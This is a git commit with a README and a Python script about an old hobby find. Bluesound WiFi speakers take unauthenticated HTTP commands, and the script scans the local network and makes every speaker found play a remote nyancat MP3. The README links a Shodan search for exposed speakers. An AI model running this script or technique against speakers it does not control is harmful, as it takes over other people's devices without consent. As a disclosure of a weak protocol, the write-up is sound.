sharing the code

This commit is contained in:
cqql 2024-07-03 21:12:23 +02:00
commit 02fec50f8d
2 changed files with 95 additions and 0 deletions

23
README.md Normal file
View file

@ -0,0 +1,23 @@
# Exploiting Insecure WIFI Speakers
This is very old, from when I was around 18. But it was fun, so I thought I'll describe the process from memory.
I knew someone who had [Bluesound](https://www.bluesound.com/) WIFI speakers and I got curious about them.
They were controllable by a dedicated smartphone app.
I installed a package capture app on my phone and tried a bunch of things in the Bluesound app. To my amazement, the app was sending pure, **unencrypted and unauthenticated `http` requests** to the speaker for every action I took, like play, pause, change track, etc. I captured enough to reverse engineer the protocol.
What I thought would be fun was to write a script that scans the whole network for Bluesound speakers and then plays the [nyancat song](https://www.youtube.com/watch?v=2yJgwwDcgV8&pp=ygUIbnlhbiBjYXQ%3D) on all of them (it was still enough of a meme back then).
[bluesound.py](bluesound.py) is that script, I am posting this unedited, just the way I found it on my hard drive. It's fun to see how differently I approached coding back then and how much I've learned since.
## is this kind of a real vulnerability?
If you search on Shodan for `Brand Display Name: Bluesound` ([link to search](https://www.shodan.io/search?query=Brand+Display+Name%3A+Bluesound)), it shows 137 results. This means you can control other people's speakers with `curl`!
so idk
## Disclaimer
Please be responsible with this. I am not accountable for misuse of this code or technique, I am just sharing an interesting find. Only try it at your own risk, on devices you own or have the owner's informed consent for.

72
bluesound.py Executable file
View file

@ -0,0 +1,72 @@
import socket
import requests
import sys
def getMyIP():
# ip = socket.gethostbyname(socket.gethostname())
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except:
ip = '127.0.0.1'
finally:
s.close()
ip = [int(part) for part in ip.split(".")]
return ip
def isBluesound(host, timeout=0.3):
try:
return requests.get("http://"+host+":11000/Status", timeout=timeout).status_code == 200
except:
return False
def scanNetwork(printProgress=False):
bluesounds = []
ip = getMyIP()
for i in range(256):
hostIP = ".".join(str(p) for p in ip[:-1]) + "." + str(i)
sys.stdout.write("\tProgress = "+ str(i)+"/255\t\r")
sys.stdout.flush()
if(isBluesound(hostIP)):
bluesounds.append(hostIP)
return bluesounds
def sendRequest(host, reqName, reqParameters = None):
reqUrl = "http://"+host+":11000/"+reqName
if(reqParameters is not None and len(reqParameters) > 0):
reqUrl += "?"
for k, v in reqParameters.items():
reqUrl += k+"="+v+"&"
reqUrl = reqUrl[:-1]
response = requests.get(reqUrl)
return response
def sendRequestToAll(hosts, reqName, reqParameters = None):
responses = {}
for host in hosts:
response = sendRequest(host, reqName, reqParameters)
responses[host] = response
return responses
def sendFuncToAll(hosts, func):
responses = {}
for host in hosts:
responses[host] = func(host)
return responses
def playNyan(host):
nyanUrl="https://www.albinoblacksheep.com/audio/mp3/Nyanyanyanyanyanyanya.mp3"
return sendRequest(host, "Play", {"url":nyanUrl})
print("Scanning the network...")
bluesounds = scanNetwork()
print("Found", len(bluesounds), "bluesound(s):", bluesounds)
print("\nSending request:")
# responses = sendRequestToAll(bluesounds, "Pause")
responses = sendFuncToAll(bluesounds, playNyan)
for host, response in responses.items():
print("\t", host)
print("\t\t"+response.text.replace("\n", "\n\t\t"))